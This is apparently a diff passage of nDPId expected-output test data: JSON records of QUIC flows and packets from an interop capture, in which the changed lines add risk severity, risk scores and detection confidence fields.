-00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434721,"flow_last_seen":1603816434721,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":50705,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"quic.westus.cloudapp.azure.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01023{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434721,"flow_last_seen":1603816434721,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":50705,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"quic.westus.cloudapp.azure.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1603816434722,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":109,"pkt_l4_len":55,"ts_msec":1603816434722,"pkt":"PKn0qB\/spJGxgjQ5ht1gDhB1ADcRMiYEqIAIAAChAAAAABJ5MAEgAQsHCsnVrqTT\/kdpHoB9EVHHYAA38EDMAAAAAAAIJzYQ4GSWjENRMDQzUTA0NlEwNTD\/AAAb\/wAAHP8AAB3\/AAAe\/wAAHw=="}
 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1603816434725,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":113,"pkt_l4_len":59,"ts_msec":1603816434725,"pkt":"PKn0qB\/spJGxgjQ5ht1gBLlEADsRMSYAHxgjENIwUQN9nn11N08gAQsHCsnVrqTT\/kdpHoB9EVLLcAA7grWbAAAAAAAI85\/7s6OU42n\/AAAg\/wAAH\/8AAB3\/AAAe\/wAAHP8AABtQQ1ExUENRMMoKiqo="}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434729,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":41857,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1603816434729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434729,"pkt":"pJGxgjQ5PKn0qB\/sht1gD9VeBNgRQCABCwcKydWupNP+R2kegH0mBkcAABAAAAAAAABoFggmo4ERUgTYcSTECgoKCghziEmCXfFrHwAARL4b9YC0jUsti7Mc5rxL4bMvXbxsMAL4olVYvjN5PRilW7n4ljBBgiUUpEp6wkwiK5RNAL1DfWrRUra5EMQLYa7yT41ymm1v6KJQRwEqyPeHRFsdBUytKI1rPpS2iH3d+FCzh5\/N6Z35TAJ9TEkCWIk+Ml+SIXBhvhzUmKrkh5gS1558X7aUVr0+OVPR\/OBAJI6M04pwjG\/TaX02ASBnVhuctq1ZReIF0Qlkld94+mqjWxQYB1h\/dpYajowgC\/v5jRQEyHEsjdqTOCfqW28oG8epcCImwCaKkDGkjO6jIwTlSxF6latNrZSmdZRrSDZoCq8uakGSkhQeQD2tbSdbJP3NIbv48WygGXsPWffl9u2ujdRJm\/mhRyLkJCjx5sa5rgRArGikWOTIFjBiZskkStgxHsaKre0OnrY1wLFpG4jthscTHZBq1DL09xjZXEQJ2ar4Dtzgafat7TI9Hfak0NczSvcPxpb3sdfCJrdFt1LLq8mrHti29tt00qMRqTnKUeIkHYHh7EQQ9oqrrtJifM5cuHsdjGPMVxm9ZUD0068DuR7m1j4gZFuCYXIep1D1iLrNXyk77C1SoyXKdL1MFZ598bVXG059RuwlXJhTx+IppuQLvyCWcvMiIipe3POlLLXybFowBGtm+37kvSW6bP+6Bxu21k5BVUZfDmEKQyiqLWLjwhxn3jDb4fTI\/tsSGhcc\/41ZbDNffoTAgxCap8FDnwN9k1QY743o2ZLez7kXEqmuCSqROQE0HUjKczuKGz33rl5rbKMOlfIb\/lA8U1oeAS0Sj3wgBhRgs1SQYzWkBHGDyVcO7BJnrphu3U5D+htX5HpNK\/0e0TAN25zjT+K8nEX\/3DxvwlbRk5wJn+AyZ6JzbbsH\/1G362DzBVBwHYtagkCvON+t57Hc8iE0aTENenXMtwoN6f1B1wYZduiqdYZPniBsQbp7yIJXGHSGCsbl9vCCVYSK6B4mOBmSs59Zd9Zrb7yQCHCnL46xUUYWuW9XHIcs0q\/XTN95d+nDWCaFZa+65E1OkZ2fioJ1I0J\/kglR5x\/pGBhYlVfLXHAZVrrS3NBUMxiwiuXE9YBgC9AX1K\/KCo5PwZac3eUtWl9Wvsqatscy6Zn2neT5yibaTDkcAz+i\/SD6bPG3oO+HswnP0fQu\/hQQV52AAn588lzkI6wOW1Nf2SkEsrPhNqIqbOT+45N1cYw4dXaKydqgziAJcH6frtCv\/BERLWdW5ewDhAVbqZlXbOJGS3oeEiYxUgAGq5frf4Jy9sSj6pAt8NpKzgi1DQyQw+BwQnHXZRD\/HBVXw3jtQ1qbfGSm14e62NKcGoZWqPZ0CTo3qMtWuIR5HUMC7Ai6bto6NZQHe4oCIJdkAxQy1eEp0C4LTqq2dwEQGt8jSA+u5zN3lFYX3qO0vvZJcB6Zk0gu35QWPxA2cbDcDeaDguvChaUcmmEJupLYmfRogah2a2iBSw05H7VN+qBky0gky1JC8ev3mlnS6NoFiCW1OUv+s0O3xZXA3kkBnLnMiQ5jYF91oGnVVU63IlOma6Ux58+jDHxiAI7Pk+X2pAFVXwS81L08kdqsBZcYLq9UHGw9rxSOOIc+iP4xlUuEXJrJ2xk2YuBRoQ=="}
-00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434729,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":41857,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"cloudflare-quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01036{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434729,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":41857,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"cloudflare-quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00629{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434729,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":56073,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02141{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1603816434729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434729,"pkt":"pJGxgjQ5PKn0qB\/sht1gCGnqBNgRQCABCwcKydWupNP+R2kegH0mBKiACAAAoQAAAAASeTAB2wkBuwTYmHTJCgoKCggVxSlYpn4UkgAARL5ZLsODdf27vLuu6GHs9eSXiVxIAlfs7TcHZcazXn4JE3\/P5JDqe+tOVWQWmWJiN1Zi+QMXxBMeLDuq2FFgXlL2mFN2Y0Hpqzt32q0IcYNEtodCx0cCDcymndGz22NucmhqDhsBTfQYSZ0TGfZ0Y1dj7OIdkztU4UKtQk0Knbx0pPfOb04IoU66JRugmLaY3NcS6\/YWs3i+G\/Z1NaiZhF7wHXHAr7RtRzKLb2gPHbqV9JkwnbYNdieDzqo6OGYxfFJAF9UdpTyC5RofrFHDOiAzzOkMjstRpfIx0da81MZNBFjRQx8VBZVl5cb5VmHHCRKqUJJ\/pimnlqr6\/rH78B0tJyJdMLcbA0k\/GEaMgb2r9k+khrfN+IYPTP9LEK9IyC61PSNuLM7lCBCfjRBxaONHiGk0HUucFiwpQMj72lTAGTUsQa8qFngN+9r0I8HgvmsmOXC4IyatQFicI6JIBY\/\/xLWv+tugw\/qAeO1niZ+nJFTAbwyvKydJ4CrRCQplld36lx1IDKeajrlxvSY4TO7ZlmYtBTR\/QIZQ1n0y7WxFPForSvTZ5LmkvmQy\/XOIdCHzDT+yu3OG+dlOa05oJSJ5squ1DJvlYS4iSqaRgDu8O1f9s7zQOTQDTlP6inO815rKmw1YpQze+QAPS9Ar8Eh6loMYvm597mpGIaaCjBGmRjM30Y3EWQUMoVmSMYlr+ndlJs0\/parg\/PrflXFNfkn\/Wllw4cvS+JLWNhoBBJwDWpM9YkqIgN6sP6Sf1ACXsEwIhZbB5T3Y+mzlz1fEroyxtSisqFOFlOCB2g0djczdb72gMhUvdB4kROfNLNOm8f4hG1ZnJraoSrQJwgrY+zsLAidSwY62GHtAM9fUNITWGPk7OLfW3OjEbL6sh7ywY+xM+yu0nYlxg0Z8ST6zlbK88Dw9rVrViSQ3Oke1RR\/RShjWSOBcuUxTcA\/eXi5dEcOdrVm6ZsDQ0chPleXisZB4yI9mZgj+jwkM4eFcO6OX8YpKRHpSZrb0SkaAHjgOICK+1d\/ehnzz7M0KNYGDy8XZ08SS3gXJzSNXZLonqI\/bweWJiS+9rlVrB5J5IwRHJDEVN2aAZJbdqAdmcFPCL7XDwYisg0GfcM\/dL5C5xxZS6hZbPHwzwJ6y7r6\/T+A0XWV92UuetwR0QSUywswmbazFGMC\/MBz94jyq\/TrHbvq8OgHad29+CNuQfDZZomN6lJoFhgu1iOIbRwea4vmYiVysTLFxxLhym6vQpFJXvihZGX2xoV1bucff9DyhT5\/Wm8sYVpYS8i2GcM3jWfruzg6rk0SVDY6hf8HFcXkvUJGnDN4KwlwULBiTr9COS06u3di2jUKJqL6FFXM1FtZVzdRf3O\/3GNXJ2HDuA4IlWQXWMcKwj7HbOKOWlf39BkQPYBB\/3CwqDH5TkC7Ny98BmDT6ZzxJIZcSDCUoAZ3M1Es1K7QjuPUiIJlOZZ8vmraAuL1z0zGli+qvbM5O\/6zJbeqSM2M0z0mrGA7v66IfdcHwb0k8mj2tM2aIyHApEXwJPFbWKxWcFb4yW1jdVDOO0dDpGwpl3Ci5EerREPl9RIKJcKdoNqRq0LiqreYf6EOoxrVqsnRGXi8dK3qw4eUScQ=="}
-00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434729,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":56073,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"http3-test.litespeedtech.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00909{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434729,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":56073,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"http3-test.litespeedtech.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00619{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434736,"flow_last_seen":1603816434736,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434736,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":43645,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1603816434736,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434736,"pkt":"pJGxgjQ5PKn0qB\/sht1gDJNoBNgRQCABCwcKydWupNP+R2kegH0gARnwAAQANAAAAAAAAAABqn0BuwTYttHMCgoKCgiHmjxz9S5+NQAARL60MndZKQNzXHuWbuWII8yYjx1QNcGEa3n\/tA\/kZwZdo0+NMbEhrCvw4fqUesktNwPhDHylUS4gcbEvHHb8Knr61qY95Pm5VKwq10YKtyHKrPUvOt6FFf4EaXlhbjCjP5PNGMuBPWvET6CR\/DNJ3amwoZ8AEiUkCCce2IA0+qLjflDvOu19oZVQSJhyk0ID2QUVFxDX+RIo\/BCEiyqGwrxxtUHNgSlpQhvXLPkd7gs0O8q\/1O3MXjjXw3VV1HTEIvgh9CIZHImqbItBAkHFYhj85297ojhzntlLLEMQUeWyYcLZaQRQLAnNxNHIfLFBwCs6Cttccxk8XUgObPlTQVTnnGvEYXJadvbFnkb5nj0E7bmqr23E\/kns4IXbYRFlEjJZfAc6UWDdSOXBoZHXMIAY\/dztkylxbqayCWGkn8v3wQJvR2xFoTyKE+Pp5saXn2uSt4EYi00Uf6fCGbypDRgDr6HED25efO5iFC99NJvuET7V90ObiIxoji+jOYwIL0BCHSm+uFeO8i7r3GmYR0Qg2iAiX6ZmlOl5gmCd40kAXe9Lo\/pKr3+r853YnPdtRNoIckFL+PsGubjlWj714eDNDRnoSoHs8UNwnNN8sF12pzQsAVr7qLBt4e8KWXFMXfkfIKWSnJhvivGIVrhMeN4RiaQ\/jippacCl0CUjlR9AUDC7DyDOswJ0+eP9X+z1Kkt7EaP13RXwGDeKbPLk\/tVc3ZXQShkobo74qelkPT7nbFmTZB78n2grmfmy0C6HMQ+qUHKH\/MfqCCK2ZnmHVM8veaHwzWHFJ4gVd2h5wLXlBRQqCB2AZzoyKpcMZFNpfGh+rTCIwQTyVZzycWPvtrbHzPNg+tUe1i\/foBt0+XApuoCCwHOsgf9nS7IFS3h97hfCh2TYTKBM6t9C3VPFYDuKYfUjriuP3G2Eq7sMAiqBDef1fYGxLN\/Dys1ZS2B2n+Zqt6K1diQtrzsIwKlRRg+XjfSSzPOVrKeXYenyNePWIMOs4YVAyvkFPV4RM\/osDQvZvShUA0iRuuMPCsj024c7WYx9lDihj4EJBymWsIkTQg0x6rfvVrFojeVlS8zgiytvfAIJsOr+k34t3NbLaK0YyfFcVKBnFDiEC5OcAMd0yi6ouvtE9rJyb\/CiH+Vtx9OSGkbowLLyCHtZ1EUgA0\/vr\/mU+ea4hE\/dLdDDjWwxrJg1oKjnYeHQvIDUT0MVaXTlMXS7\/F6HA7\/5QTayU5MU3hKtpwhACAx5gHHhue3iTscqXigKQ7oiaLOdxRIJ2wKmzNzvQPCG5UmOLnsbM\/3lI+SzzLjMM5HxKsnb7yJmS6z2+tdEoxPOa5ZNm7Wc1LoGgLZd+x+V88MeQDFaBDMQHNWCS8z7Ruv7Q8Jc\/JKShee1avRiWD+QjKfpjPULJzGhq8IhO+3xUZoq\/xSnX5PQ7xqYQY3oim9xsL+ADJPPe0oE2O\/lbNfbGhouInwUUVqUmdk\/fion2o\/ylxCHaGoB6j8tJgJq8ystdV8ErJCcEhkKohD7qeUu1YL\/exHAdFqCo5yGAJyVZFmJD6CkMOCvG195MdsDa2WfPCN+fs1Twy5bRnpAdq\/aOqOWkb9sVtpRcByoK+nPaUgcYcmBQw=="}
-00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434736,"flow_last_seen":1603816434736,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434736,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":43645,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.rocks","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434736,"flow_last_seen":1603816434736,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434736,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":43645,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.rocks","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 02134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1603816434738,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434738,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA8ydAAEARtHzAqAGAwb4KYucjEVEE7P8dwwoKCgoIOPxKwZ+D2JAAAETSb9UlQE89ABeQeI\/QpsT81kvbf+yGJkDFJiGPzWvy81KCH2cJiDSPisJ1QnX5xtmzBkvUHRp2FuQGYa\/pilZqNP70VReX07WlD\/pZQJVCbigdcxMaEYZASHVRfutuRBKJAqHBAwLkNLD3Z3I0ZaHCqcS9KYzw98tkCokzq6mDpHzHtf6ExbYo4N0cIacCNvdP+KsCtrUQL5WlJ9CyKBD242cIc5CKdLYQTld3qevU3UaqfhVdl5eNkntpOfIkomDk06sEpzJqxU7qHCvJeRN5m5L79zL+gTeIyE9Asm2jjoxtsNgfImDjEtUQxGhWbcpzrh3DpfCal+\/Lh3\/9pzSQhk5oc7WisaXX4PMLYNl+D\/m52ZU0UFUhE0+l9n3VSr0dkOaUEe35MHeuokXZgwXZNMBFC5igXXlE8UTLsi0ue8JTTCNLCTt+A2z1dpM8DEqH3biH+qPKj7JaqT0dHO+FKOdg2AM+f4RwN8QCF26RT62FuMBNmyc7aD4PDQPxUCYmRi0UGMYomOoMy8hZ\/jdhA0wX+8Om3VVga0TGy7NSDrerhKL7+YEsof035rdtPH0Y3j599QoVaO64ZA3v+T3u\/PfqnGSNilFgI9flDp09Oakd9oM2lrpaAWLKUI\/yiWEn06khwuxYpdaA+jHlJRUxbcAtBcEA7Cj1DsLuovsIWklWe2vDb5Co0vAUw5gsM+5gFIyui6IYAnMYEgYAo0c5k8aJzc1BMlQVQ3DaV0O66JJgt45uH5jizP8oxu2Wh52E9LT2KVQJhcHClILWv+P8RGxhrIU6t17U1LVUVBWrmKV60at1NW+rS5XSlF37anegq12p4\/NuoM\/YA2qu2AGPkJxiKmaQkbUvxD27zSetz4qW8RHM7iubRGqfzIBqjSpWnrxid4CaaVVEodx37MBRM60oKdEd8diMaexoLpCHpXy9\/9K2ILLllW9BNa9VJqdBFl\/PG2+3KXrSPTzMih\/0LgFxzrGSKn0cLTERd6NQOkq4kYFwu05o3XKSFMJCrrKttzDQOD0Xxkg+EwHHOHzZmUPRCHUL9xhPxEJdnU1P\/3DLDZMnviROzqkxPMEGYvrPbBWkCovwDH0\/6kXKJUwTNn4cbIQkW\/t2p9CS7lBLRdj+DcuKY4rzac0WcEfT58KRBSZN+EEOJ8ox4ywybHsEVQIhRgiC6M8tZ0Xtu+jwmRkD7RXtD4ivQRzZZrdRaM7+tfWpzYQViq1cUl0HobKvf8BQLMQNaUHuCe2x0spprn6wrhwmhtFLZM\/3JUQaheNThydzrhRsBxsueLLPS2wSHRf5YbXUOfqKT8x1ZUxl1Cu9Q2MBtIfuiHdJowbL58DK14UHd5YMvnZi5fDRxVUztKDIVYQMqMKH8yV9xD3VGPyIiH8IGHHs5mHayhzBKpOTDNSJvoWCwUSiT09RuRXMK392nYlXWcB1GHTIFJkC8XToE5ImQ07hzYbIBq2ramFYEZ541ak4WuKuC31\/KEs2j8jC9NQ9YUqFgEBERIZrXwnuyNqHXFfcqkiJHQ96OMVEUoO+dD1RwDoPZlAiSL6Y0xKWblqIJeilsDd4MRdVKt2kHPj3frisO3sEnc1o4dW8rgPCUUWuyR+3XiwvLjWNq9104NxX8nzAm\/FnVOMJuAoC5Q=="}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434743,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":48644,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1603816434743,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434743,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAbxtAAEARaETAqAGAg58Yxr4EEVIE7BzKwgoKCgoIBzLrVZ9ibJ4AAETSpSIYhDhoiEFvP1qBCfMoU\/4qjpQbb9U7jdmFrc8viSpjQA7eDSIQICGT\/pnAELg3vnpeBC5hTrSAg5y0v3Nvj85YCDRYDUNtZg\/gqc9lMinrr2qy\/+tACJsh9TULiMkhVXBS\/DnqCBfVla2xKSlWGVYDfxfjWPLOnhjK4tuRvdsBg38QhZovgQwbE74gpeM+C0l1yFZQr\/3HZtCstNCtOu3UtW84W17PI7FfcdTn2s7KMsKWIseHKaKkB14DaKKUlr8b+M0Keb3aJipD33LW0ttcYvVI7edW5O9HmyMTEHHmLBoOENtgq1qxmaA8dcVwULmdz7v7A89bnJ9YPWVoQT\/AY3vPa9CPc7aXzzjpQHzXvLmR1Cp8lyfevJQBBugOzD1EFG+6ORqgxwy\/t3AMVq6UiTAqOHk10YiYfoOWp0mc0l792MEYihPH4U0Q4J\/xWCQfYBLc2RwO5JS8\/rBGN\/OkQMwq3X5t9nFOjPPZBRc\/+vV3l78KFWTME722BMgiyt1PB0IMcr\/wY9oB71n3944uqDUTQxh283ZrXbfA6w8v7iNeB1nvtIkfZTo5\/9dY9NpiV9qF4AHCmIy\/ojTRgA9UIdX8hEx5O0FmtvynQ+mLeozICBFeXAnpoY8U5dl0a8wlaBpakWQutMPrk\/nAriiy1jFsR5LnosEI4Yz6\/MFOg7bYZIyHPK\/xf+9zlkY7T4qEj6ycOajZ1TYCeHMIlwhBWcOIPbgRWdOWETBlCd6sWgfOMwJCAXcjFu88KLuQ+pCjd31kktdw1RVYXCTbQod3cSDHFSoD6z7zQZ32UQ\/kR6M7QstvWKuGXKrevWSqUPnQ7HrYNQDFIBkklqFkxbVZcSnT4UUB7KQmwYtQUc3FO7o6Sx9BRuD68Yg\/gcvk3BApsJtzmbS7xsNHmaRwAqrqaj4+m2ULPGLQS80